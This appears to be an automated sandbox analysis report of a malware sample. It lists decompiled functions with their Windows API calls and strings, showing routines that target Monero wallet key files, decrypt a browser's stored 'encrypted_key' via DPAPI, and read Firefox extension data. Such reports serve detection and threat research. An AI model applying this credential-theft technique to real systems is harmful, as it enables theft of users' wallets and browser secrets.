Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 8e9efa14dbc583184a66964580da555f18b13431efe1b487a77aa19e541ecace
Instruction ID: 4f36e1f3738e80cb3977ace4a20cd88bf2d23e5ea4c9cec06689facf62acbc56
Opcode Fuzzy Hash: 8e9efa14dbc583184a66964580da555f18b13431efe1b487a77aa19e541ecace
Instruction Fuzzy Hash: 5F011DB9A54208BFDB00DFE4DC49FAEB7B8EF48701F008159FA0597280D7749A01DB91

Function 0076A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(012591F8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0076A0BD
LoadLibraryA.KERNEL32(0125D8D0), ref: 0076A146

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A820: lstrlen.KERNEL32(00764F05,?,?,00764F05,00780DDE), ref: 0077A82B
Part of subcall function 0077A820: lstrcpy.KERNEL32(00780DDE,00000000), ref: 0077A885

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

SetEnvironmentVariableA.KERNEL32(012591F8,00000000,00000000,?,007812D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00780AFE), ref: 0076A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0076A0B2, 0076A0C6, 0076A0DC

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-1843082770
Opcode ID: c9db36e06795fc3e73426c7820f6a7e6287445efde32827d1605fa0082cff945
Instruction ID: 7c9f331191b7fab5e32fda4cad7515dfdcb7763a488150abff197e2485c1319d
Opcode Fuzzy Hash: c9db36e06795fc3e73426c7820f6a7e6287445efde32827d1605fa0082cff945
Instruction Fuzzy Hash: BA4155B1929104EFDB45DFA4EC59AAE33B4BF46305F184128F506A32A1DB385944DFE3

Function 0076A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 00778B60: GetSystemTime.KERNEL32(00780E1A,0125AB00,007805AE,?,?,007613F9,?,0000001A,00780E1A,00000000,?,01259048,?,\Monero\wallet.keys,00780E17), ref: 00778B86

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0076A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0076A3FF
lstrlen.KERNEL32(00000000), ref: 0076A6BC

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

DeleteFileA.KERNEL32(00000000), ref: 0076A743

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 3e9e64b7692b9b9b6dc3d46cc8f0938295735347c4fc2fd8e86a53703fdcb862
Instruction ID: 31815afad2c0ee8394081152bef446b47dfe94eb639117edbd765578056e1e57
Opcode Fuzzy Hash: 3e9e64b7692b9b9b6dc3d46cc8f0938295735347c4fc2fd8e86a53703fdcb862
Instruction Fuzzy Hash: 83E1C272810108EBEF05FBA4DC99DEE7378AF54340F50C169F51A76091EF386A59CBA2

Function 0076D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 00778B60: GetSystemTime.KERNEL32(00780E1A,0125AB00,007805AE,?,?,007613F9,?,0000001A,00780E1A,00000000,?,01259048,?,\Monero\wallet.keys,00780E17), ref: 00778B86

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0076D801
lstrlen.KERNEL32(00000000), ref: 0076D99F
lstrlen.KERNEL32(00000000), ref: 0076D9B3
DeleteFileA.KERNEL32(00000000), ref: 0076DA32

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 70b6fdf4009ff8c72872bc8fe09c4a68def09856371de6bf45589e9a9d7c3f82
Instruction ID: e7c2d06686f2a9f5ae5d5c32026b80cbde85086a8bbd55d2eb707c4b344b8a32
Opcode Fuzzy Hash: 70b6fdf4009ff8c72872bc8fe09c4a68def09856371de6bf45589e9a9d7c3f82
Instruction Fuzzy Hash: F1810271910104EBEF05FBA4DC5ADEE7378AF94340F508128F51BA6091EF386A19DBA3

Function 0076F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007699EC
Part of subcall function 007699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00769A11
Part of subcall function 007699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00769A31
Part of subcall function 007699C0: ReadFile.KERNEL32(000000FF,?,00000000,0076148F,00000000), ref: 00769A5A
Part of subcall function 007699C0: LocalFree.KERNEL32(0076148F), ref: 00769A90
Part of subcall function 007699C0: CloseHandle.KERNEL32(000000FF), ref: 00769A9A

Part of subcall function 00778E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00778E52

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00781580,00780D92), ref: 0076F54C
lstrlen.KERNEL32(00000000), ref: 0076F56B

Strings

moz-extension+++, xrefs: 0076F5AD
^userContextId=4294967295, xrefs: 0076F59C

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 00d32f6a823d2e167fcfffd3d1aada113246793cb58c9772e3c7a8a549a89a66
Instruction ID: a0c1fdc8d21b6183adcf15297333ba8d2b1d4e0192d8b0876cd87311fbe90df7
Opcode Fuzzy Hash: 00d32f6a823d2e167fcfffd3d1aada113246793cb58c9772e3c7a8a549a89a66
Instruction Fuzzy Hash: E851C671D10108EAEF05FBB4DC5ADEE7378AF94340F50C528F91A67191EE386619CBA2

Function 007770D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

sw, xrefs: 00777111
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0077718C
sw, xrefs: 007772AE, 00777179, 0077717C

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: sw$sw$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-834698891
Opcode ID: 1a879444d64b31ee413fabfafa86d8080ad4528f487c5a237f47c9fdbc509d31
Instruction ID: 40a42fda479c13a90544d61b4cfd0fcdd4e2f10742d3f2faeb48cc28c00e66e4
Opcode Fuzzy Hash: 1a879444d64b31ee413fabfafa86d8080ad4528f487c5a237f47c9fdbc509d31
Instruction Fuzzy Hash: 025151B0D04218EBDF58EBA0DC95BEEB374AF44344F50C1A8E61976181EB786E88CF55

Function 00769CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 007699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007699EC
Part of subcall function 007699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00769A11
Part of subcall function 007699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00769A31
Part of subcall function 007699C0: ReadFile.KERNEL32(000000FF,?,00000000,0076148F,00000000), ref: 00769A5A
Part of subcall function 007699C0: LocalFree.KERNEL32(0076148F), ref: 00769A90
Part of subcall function 007699C0: CloseHandle.KERNEL32(000000FF), ref: 00769A9A

Part of subcall function 00778E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00778E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00769D39

Part of subcall function 00769AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nv,00000000,00000000), ref: 00769AEF
Part of subcall function 00769AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00764EEE,00000000,?), ref: 00769B01
Part of subcall function 00769AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nv,00000000,00000000), ref: 00769B2A
Part of subcall function 00769AC0: LocalFree.KERNEL32(?,?,?,?,00764EEE,00000000,?), ref: 00769B3F

Part of subcall function 00769B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00769B84
Part of subcall function 00769B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00769BA3
Part of subcall function 00769B60: LocalFree.KERNEL32(?), ref: 00769BD3

Strings

, xrefs: 00769DC1
DPAPI, xrefs: 00769D89
"encrypted_key":", xrefs: 00769D30

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
